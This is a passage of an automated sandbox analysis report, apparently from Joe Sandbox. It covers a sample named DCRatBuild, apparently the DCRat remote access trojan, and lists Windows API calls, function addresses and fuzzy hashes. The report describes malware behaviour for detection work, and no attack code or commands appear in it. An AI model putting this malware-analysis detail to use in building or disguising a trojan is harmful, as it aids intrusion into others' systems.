                                      • Instruction ID: 1ddb9b9796cb8b245f1eda6857be0cb73a6d69bf86cb8a2a60507e0d49f79d04
                                      • Opcode Fuzzy Hash: 170e464dd93119925a7efb41907e30f9199b39cab49101f5aecb7c3e1a640dcb
                                      • Instruction Fuzzy Hash: 534144B0805B409EE724DF798885AE7FBE5FF18310F444A2ED5EE83282DB362554DB11
                                      APIs
                                        • Part of subcall function 00F28FA5: GetLastError.KERNEL32(?,00F40EE8,00F23E14,00F40EE8,?,?,00F23713,00000050,?,00F40EE8,00000200), ref: 00F28FA9
                                        • Part of subcall function 00F28FA5: _free.LIBCMT ref: 00F28FDC
                                        • Part of subcall function 00F28FA5: SetLastError.KERNEL32(00000000,?,00F40EE8,00000200), ref: 00F2901D
                                        • Part of subcall function 00F28FA5: _abort.LIBCMT ref: 00F29023
                                        • Part of subcall function 00F2B2AE: _abort.LIBCMT ref: 00F2B2E0
                                        • Part of subcall function 00F2B2AE: _free.LIBCMT ref: 00F2B314
                                        • Part of subcall function 00F2AF1B: GetOEMCP.KERNEL32(00000000,?,?,00F2B1A5,?), ref: 00F2AF46
                                      • _free.LIBCMT ref: 00F2B200
                                      • _free.LIBCMT ref: 00F2B236
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorLast_abort
                                      • String ID:
                                      • API String ID: 2991157371-0
                                      • Opcode ID: 14b967567dbd20955855c56ae4db641c81f3490b8d5a80ea457dc3d6e9a23255
                                      • Instruction ID: 63cacd96a08d396e59a89d4ab7027600a083c8efbf41401c9fc34980c21ba49d
                                      • Opcode Fuzzy Hash: 14b967567dbd20955855c56ae4db641c81f3490b8d5a80ea457dc3d6e9a23255
                                      • Instruction Fuzzy Hash: 7831F431D04228EFDB11EFA9E841BADB7E1EF40330F254099E8149B291EB799D42EB50
                                      APIs
                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00F09EDC,?,?,00F07867), ref: 00F097A6
                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00F09EDC,?,?,00F07867), ref: 00F097DB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 41ce38d05822977966c39c75320fd7a8d69f5120622f2c971d9a86b56469b6aa
                                      • Instruction ID: de95d7eaeb95986a72e2356423cb71124b384505d7d17039da616aed3ff3eb62
                                      • Opcode Fuzzy Hash: 41ce38d05822977966c39c75320fd7a8d69f5120622f2c971d9a86b56469b6aa
                                      • Instruction Fuzzy Hash: DC210AB2514748AFE7308F14CC85BA7BBE8EB49764F00491DF5E5821D2D3B4AC85BB61
                                      APIs
                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F07547,?,?,?,?), ref: 00F09D7C
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F09E2C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: c1d556c00e41425e87a724b18985867c709b5e101c30fba1945d773df9b572b8
                                      • Instruction ID: a9a634b34a15a23d2bb674b3b036f04d8782b0fc6fa60eafe2a36f14b4712543
                                      • Opcode Fuzzy Hash: c1d556c00e41425e87a724b18985867c709b5e101c30fba1945d773df9b572b8
                                      • Instruction Fuzzy Hash: DD21F63158D246ABC714DE24C851AABBBE4AF91318F04081CB8D0C3182E769DA4CFB51
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,00F33958), ref: 00F2A4B8
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F2A4C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: 40af79e0b3ba974b073a32742bf4e80210272e214e43984fae509dc1abc7450e
                                      • Instruction ID: 535f9f3402a4f3282a2c561836db4f97bb2ce1eabe26e6c5cbb896adefc7b84d
                                      • Opcode Fuzzy Hash: 40af79e0b3ba974b073a32742bf4e80210272e214e43984fae509dc1abc7450e
                                      • Instruction Fuzzy Hash: 0E110A33E116359F9B25EE28FC4599A7396AB803307164220FD15EB264EA70DC41F6D2
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00F09B35,?,?,00000000,?,?,00F08D9C,?), ref: 00F09BC0
                                      • GetLastError.KERNEL32 ref: 00F09BCD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 74a49dff37d7b03a85381bb52e4780d94f296abe9f5ebca1c167e36f13690248
                                      • Instruction ID: 42f4964663f1f6734b1d393ef23addc14aa5001943b34a713e426084c7a7de57
                                      • Opcode Fuzzy Hash: 74a49dff37d7b03a85381bb52e4780d94f296abe9f5ebca1c167e36f13690248
                                      • Instruction Fuzzy Hash: D40108B230D2159BCB08CF25AC8497EB399AFC0331B10452DF812832D2FAB0DA05B620
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00F09E76
                                      • GetLastError.KERNEL32 ref: 00F09E82
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: c420f451e2c5a0318077d65aa4fad5fb7bb3cef81a950b6b3b5c7996776d731d
                                      • Instruction ID: e5b84066a588535c2312f9d4d8eb8bde2055786642fc578683947d8cad95a08c
                                      • Opcode Fuzzy Hash: c420f451e2c5a0318077d65aa4fad5fb7bb3cef81a950b6b3b5c7996776d731d
                                      • Instruction Fuzzy Hash: 8701F5B17082005BEB34DF29CC4476BB7D99B84325F10493DF142C36C1EAB4EC48B620
                                      APIs
                                      • _free.LIBCMT ref: 00F28627
                                        • Part of subcall function 00F28518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00F40F50,00F0CE57,?,?,?,?,?,?), ref: 00F28663
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Heap$AllocAllocate_free
                                      • String ID:
                                      • API String ID: 2447670028-0
                                      • Opcode ID: b469422082df45c253ac2f3278cd875e81d4bd437043f06802db7045a94a35a3
                                      • Instruction ID: 52e4abbf8ca3a3d53a97d1961638b2de2205bc9c876f12abb0d73f99eb43c9d3
                                      • Opcode Fuzzy Hash: b469422082df45c253ac2f3278cd875e81d4bd437043f06802db7045a94a35a3
                                      • Instruction Fuzzy Hash: 15F062325071356ADB312A65BC01B6B3F599F91BF1F288115F81497591DF28CC03B5A5
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00F10915
                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00F1091C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: 1ef6bd9325316e21d16d3751d77fdb6387a6da4746a98b16541fc0739cfb73ba
                                      • Instruction ID: 742cb89cdaa47844e7a707ad1fe93d53fee6f5f008cbd3e94ae07716dc7058d7
                                      • Opcode Fuzzy Hash: 1ef6bd9325316e21d16d3751d77fdb6387a6da4746a98b16541fc0739cfb73ba
                                      • Instruction Fuzzy Hash: 64E09272E10109AB6F09CAB49C149FB739DEB142247604179A807D7301FD70DEC1A6A0
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A27A,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A458
                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A27A,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A489
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: e77a039298f933c5190b48da748c5327739dbfceafe252166aa22c48c402855c
                                      • Instruction ID: 2c0af39be6ae3663bf5b07873de6343ce687fa49345215bc228bd4852f8bedae
                                      • Opcode Fuzzy Hash: e77a039298f933c5190b48da748c5327739dbfceafe252166aa22c48c402855c
                                      • Instruction Fuzzy Hash: 5DF0A03524020D7BEF019F60DC45FD9776DBB04396F048051BC88861A1DB768AA9BA50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemText_swprintf
                                      • String ID:
                                      • API String ID: 3011073432-0
                                      • Opcode ID: 06b9308130c9a0259f0786577cb2bfe93189596f74327d8d3c5563f37b3ecec4
                                      • Instruction ID: 5aadfc2a10dc2c71c302b48abfc108c39422ab02c06ed10be2660211daadf37e
                                      • Opcode Fuzzy Hash: 06b9308130c9a0259f0786577cb2bfe93189596f74327d8d3c5563f37b3ecec4
                                      • Instruction Fuzzy Hash: 1CF0EC7250434C7AEB11EBB19C06FDD376D9705745F040555BB00530F2D9756A907761
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,?,00F0984C,?,?,00F09688,?,?,?,?,00F31FA1,000000FF), ref: 00F0A13E
                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00F0984C,?,?,00F09688,?,?,?,?,00F31FA1,000000FF), ref: 00F0A16C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: c9b3ef94cf45e0a86a3e81649b2f8b3c12a0313a82317ffec8eddbb7a2851426
                                      • Instruction ID: e2773c0c69ce7c0cca84b24039398b20f195cc0f8e4bdb9f936ba5fa0399954b
                                      • Opcode Fuzzy Hash: c9b3ef94cf45e0a86a3e81649b2f8b3c12a0313a82317ffec8eddbb7a2851426
                                      • Instruction Fuzzy Hash: 31E0927564020C6BEB119F60DC41FE97B6CAB08392F484065BC88C30A1DB629ED4BE90
                                      APIs
                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00F31FA1,000000FF), ref: 00F1A3D1
                                      • OleUninitialize.OLE32(?,?,?,?,00F31FA1,000000FF), ref: 00F1A3D6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: GdiplusShutdownUninitialize
                                      • String ID:
                                      • API String ID: 3856339756-0
                                      • Opcode ID: 5aaf39f241d4609767607df0325a36b4e9c6deed9b34b088d909b9b13c275c1d
                                      • Instruction ID: 70a49c6edfc03b434658d351bc498ffc910f9c44c9438dcb3f3666bcc921a8e5
                                      • Opcode Fuzzy Hash: 5aaf39f241d4609767607df0325a36b4e9c6deed9b34b088d909b9b13c275c1d
                                      • Instruction Fuzzy Hash: F4F06532618658DFC710EB5CDC05B59FBADFB49B30F04436AF41983760CB796801DA91
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00F0A189,?,00F076B2,?,?,?,?), ref: 00F0A1A5
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00F0A189,?,00F076B2,?,?,?,?), ref: 00F0A1D1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F100A0
                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0EB86,Crypt32.dll,00000000,00F0EC0A,?,?,00F0EBEC,?,?,?), ref: 00F100C2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystem
                                      • String ID:
                                      • API String ID: 1175261203-0
                                      APIs
                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F19B30
                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00F19B37
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: BitmapCreateFromGdipStream
                                      • String ID:
                                      • API String ID: 1918208029-0
                                      APIs
                                        • Part of subcall function 00F2329A: try_get_function.LIBVCRUNTIME ref: 00F232AF
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F2217A
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00F22185
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      APIs
                                      • DloadLock.DELAYIMP ref: 00F1DC73
                                      • DloadProtectSection.DELAYIMP ref: 00F1DC8F
                                        • Part of subcall function 00F1DE67: DloadObtainSection.DELAYIMP ref: 00F1DE77
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Dload$Section$LockObtainProtect
                                      • String ID:
                                      • API String ID: 731663317-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
